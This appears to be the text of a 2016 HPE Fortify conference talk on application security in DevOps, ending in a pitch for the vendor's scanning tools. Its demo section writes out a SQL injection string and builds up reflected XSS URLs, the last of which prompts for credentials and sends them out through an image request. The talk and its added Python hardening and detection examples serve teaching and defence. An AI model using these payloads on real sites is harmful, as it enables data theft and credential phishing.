Discover Best of Show, March 2016, Düsseldorf


Discover Best of Show 2016, 2-3 March 2016, Düsseldorf

2-3 March 2016. Software Security in the Age of DevOps. Lucas von Stockhausen, Regional Product Manager, Fortify

The case for application security: "I am secure, I have a firewall."

Malware over the years (source: HPE Security Research Cyber Risk Report 2016)

There is a breach in the headlines almost every day: http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/

[Chart: aircraft accidents and casualties over the years. Number of accidents and fatalities per year (excluding sabotage, shoot-downs). Source: https://aviation-safety.net/statistics/period/]

The increase in attacks is constant (sources: Ponemon Cost of Cyber Crime Study 2012 and Ponemon Cost of Cyber Crime Study 2015)

Existing network and perimeter based security is insufficient: 84% of breaches exploit vulnerabilities in the application layer, yet the ratio of spending between perimeter security and application security is 23-to-1. Source: Gartner Maverick Research, "Stop Protecting Your Apps; It's Time for Apps to Protect Themselves" (2014)

Basic hacking example

Live example: SQL injection, Telnet, cross-site scripting

SQL injection. The vulnerable code builds the query by string concatenation, so whatever the user supplies as itemname becomes part of the SQL grammar:

```java
String username = ctx.getAuthenticatedUserName();
String itemname = request.getParameter("itemname");
String query = "SELECT * FROM items WHERE owner = '" + username
             + "' AND itemname = '" + itemname + "'";
// executeQuery rather than execute: only executeQuery returns a ResultSet
ResultSet rs = stmt.executeQuery(query);
```

With username = lucas and itemname = x' or 1=1; -- the concatenation becomes:

```java
String query = "SELECT * FROM items WHERE owner = '" + "lucas"
             + "' AND itemname = '" + "x' or 1=1; --" + "'";
```

and the database receives:

```sql
SELECT * FROM items WHERE owner = 'lucas' AND itemname = 'x' or 1=1; -- '
```

The trailing `-- '` comments out the closing quote, and `or 1=1` makes the WHERE clause true for every row, so the query returns all items regardless of owner.
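As an added example (not from the slides), the same concatenated query beside its parameterized replacement, run in Python against a constructed in-memory SQLite table instead of the slide's Java/JDBC code; the table contents and helper names are assumptions:

```python
import sqlite3

# Constructed sample data standing in for the slide's "items" table.
SAMPLE_ITEMS = [
    ("lucas", "laptop"),
    ("lucas", "badge"),
    ("alice", "passport"),
    ("bob", "keys"),
]

# The attacker-controlled itemname value shown on the slide.
INJECTED = "x' or 1=1; --"


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE items (owner TEXT, itemname TEXT)")
    con.executemany("INSERT INTO items VALUES (?, ?)", SAMPLE_ITEMS)
    return con


def lookup_concatenated(con, username, itemname):
    # Mirrors the slide's Java: the value is spliced into the SQL text, so
    # quotes, OR and comment markers inside it change the query's meaning.
    query = ("SELECT owner, itemname FROM items WHERE owner = '" + username
             + "' AND itemname = '" + itemname + "'")
    return con.execute(query).fetchall()


def lookup_parameterized(con, username, itemname):
    # Hardened form: placeholders keep both values as data; the same
    # injected string is simply compared as a literal item name.
    query = "SELECT owner, itemname FROM items WHERE owner = ? AND itemname = ?"
    return con.execute(query, (username, itemname)).fetchall()


def demo():
    con = make_db()
    return {
        "concat_injected": lookup_concatenated(con, "lucas", INJECTED),
        "param_injected": lookup_parameterized(con, "lucas", INJECTED),
        "param_normal": lookup_parameterized(con, "lucas", "badge"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The concatenated lookup returns every row in the table, including other owners' items; the parameterized one returns nothing for the injected value and exactly one row for a real item name.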

SQL injection

Telnet session

XSS: cross-site scripting

Real-world payloads

Real-world payloads. So, what is XSS truly capable of? What can you execute?

Simple answer: JavaScript. Wait. That weak-sauce web scripting language that you had to learn in college back in the day? How bad could it be?

JavaScript is a full-featured programming language:
- Object-oriented
- C-like syntax
- Extremely powerful
- Native in every browser

In sum, being able to run JavaScript on a victim's browser has a LOT of potential. Let's take a look at a possible attack and how to build it up. Let's go to http://legacy.webappsecurity.com

The payload, built up step by step against the err parameter of banklogin.asp:
- http://legacy.webappsecurity.com/banklogin.asp?err=<script>alert("buh");</script>
- http://legacy.webappsecurity.com/banklogin.asp?err=<script>username=prompt('please enter your username',' '); password=prompt('please enter your password',' '); alert("username="%2b%0ausername%2b%0a" and password="%2b%0apassword);</script>
- http://legacy.webappsecurity.com/banklogin.asp?err=<script>username=prompt('please enter your username',' '); password=prompt('please enter your password',' '); document.write('<img src="http://localhost:8080/splc/images/top.jpg" alt=""'); document.write('<br>invalid Login: '%2B%0Ausername);</script>
- http://legacy.webappsecurity.com/banklogin.asp?err=<script>username=prompt('please enter your username',' '); password=prompt('please enter your password',' '); document.write('<img src="http://localhost:8080/splc/listmyitems.do?username='%2busername%2b'%26password='%2bpassword%2b'">'); document.write('<br>invalid Login: '%2Busername);</script>

There are many other possibilities and opportunities. Remember, if these are the easy options, imagine what others are capable of!

There are a number of ways to launch the actual attack:
- Stored XSS
- Reflected XSS
- Owning a page that a victim visits

Remember, navigating to a page is permission to run what's on that page. Consider visiting a webpage an act of significant trust.
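As an added example (not from the slides), the defender's side of the reflected err parameter above: the unescaped rendering the demo page performs beside an HTML-encoded one, plus a simple check over constructed request URLs that flags script-like err values; the sample URLs are constructed and the function names are assumptions:

```python
import html
from urllib.parse import urlsplit, parse_qs

# Constructed sample requests: the first two carry the slide's reflected-XSS
# payloads (one URL-encoded), the third is an ordinary error message.
SAMPLE_REQUESTS = [
    "http://legacy.webappsecurity.com/banklogin.asp?err=<script>alert(\"buh\");</script>",
    "http://legacy.webappsecurity.com/banklogin.asp?err=%3Cscript%3Eusername="
    "prompt('please enter your username',' ')%3C/script%3E",
    "http://legacy.webappsecurity.com/banklogin.asp?err=Invalid+login,+please+try+again",
]


def err_param(url):
    """Decoded value of the err query parameter ('' if absent)."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("err", [""])[0]


def render_error_unescaped(err):
    # What the demo page does: the parameter is dropped straight into the
    # HTML, so a <script> tag inside it is parsed as markup and executed.
    return "<p class='error'>" + err + "</p>"


def render_error_escaped(err):
    # Hardened form for an element-content context: '<' arrives as '&lt;',
    # so the browser displays the text instead of running it.
    return "<p class='error'>" + html.escape(err, quote=True) + "</p>"


def flag_reflected_script(urls):
    # Detection: requests whose decoded err value carries script-like markup.
    markers = ("<script", "javascript:", "onerror=", "onload=")
    return [u for u in urls if any(m in err_param(u).lower() for m in markers)]


if __name__ == "__main__":
    for u in flag_reflected_script(SAMPLE_REQUESTS):
        print("flagged:", u)
    print(render_error_escaped(err_param(SAMPLE_REQUESTS[0])))
```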

What is the reason?

Today's approach: expensive, reactive
1. Somebody builds insecure software
2. IT deploys the insecure software
3. We are breached, or pay someone to tell us our code is insecure
4. We convince and pay the developer to fix it

Cost: why it doesn't work. It is 30x more costly to secure in production. Relative cost of fixing a defect by phase (source: NIST): Requirements 2x, Coding 5x, Integration/component testing 10x, System testing 15x, Production 30x. After an application is released into production, it costs 30x more than during design.

The right approach: systematic, proactive
1. Embed security into the SDLC development process
2. Leverage a security gate to validate the resiliency of internal or external code (in-house, outsourced, commercial, open source) before production
3. Improve SDLC policies; monitor and protect software running in production
This is application security.

The help:
- Static Application Security Testing (SAST)
- Dynamic Application Security Testing (DAST)
- Interactive Application Security Testing (IAST)
- Runtime Application Self Protection (RASP)

Example process for analysis (diagram). Steps: 1. Identify, 2. Audit, 3. Assign, 4. Fix, 5. Validate, 6. Report. Development team side: Developer, Development Manager, IDE, Source Code Repository(s), Build Tool, Central Build Server(s), Defect Tracking System. Security side: Security Auditor, Project Security Lead, CISO, AWB, Fortify SCA, WebInspect, Fortify SSC Server, Fortify CM (Monitor CM).

Movement to DevOps. Business leaders have agility at the top of their priorities as they prepare for the fast-paced, very competitive future. Processes need to be further streamlined to minimize resource consumption and reduce time-to-market. Security context: development organizations can save time and money by building in security early in the development process.

Challenges in a DevOps environment:
- Developers are not security experts
- Security testing is an afterthought
- Pressure to push out software into production leaves no time for security
- Security assessments take up resources

Introducing HPE Security DevInspect: bringing application security closer to the developer. An AppSec solution created for developers to identify and remediate security vulnerabilities in source code within the developer's native environment. Brings market-leading AppSec technologies directly to the developer, ensuring secure code as you shift left in your development process. Real-time, instant security results as the developer is writing code. Enables developers to assess for security weaknesses.

End-to-end application security across static, dynamic and runtime analysis: on-premise (DevInspect, App Defender) and on-demand (Fortify on Demand, App Defender), covering application development.

HPE Security DevInspect: static code analysis (real-time lightweight analysis of the source code), dynamic analysis, runtime analysis, documentation.

What's included in DevInspect 1.0?
- Static code analysis: real-time lightweight analysis of the source code
- Integration for Fortify Software Security Center (SSC)
- Integration for Fortify on Demand (FoD)
- Documentation

Key benefits
DESIGNED FOR THE DEVELOPER: fully integrated into the native development environment (IDE); supports the DevOps toolchain; provides thorough and robust software security analysis of an application.
INSTANT RESULTS (fast): inline analysis of the source code as the developer types, providing immediate feedback; out-of-the-box results, no configuration required.
CONTINUOUS FEEDBACK: continuously updated security findings as code is written; tracks findings and guides developers toward remediation.

Example process for static analysis in DevOps (diagram). Steps: 1. DevInspect in the IDE, 2. Check-in to the Source Code Repository(s), 3. Milestone scan (Fortify SCA on the Central Build Server(s), results to Fortify SSC Server), 4. Validate (AWB, Security Auditor), 5. Report. Other participants and components as in the earlier process diagram: Development Teams, Development Manager, Project Security Lead, CISO, Defect Tracking System, Build Tool, WebInspect, Fortify CM (Monitor CM).

Security Assistant: real-time lightweight analysis of the source code.
- Fortify menu for additional options
- Fortify icon added to the icon bar
- Detailed remediation advice
- Vulnerable line of code highlighted, with a tooltip for additional information
- All issues detected in the project

Thank you. lvonstockhausen@hpe.com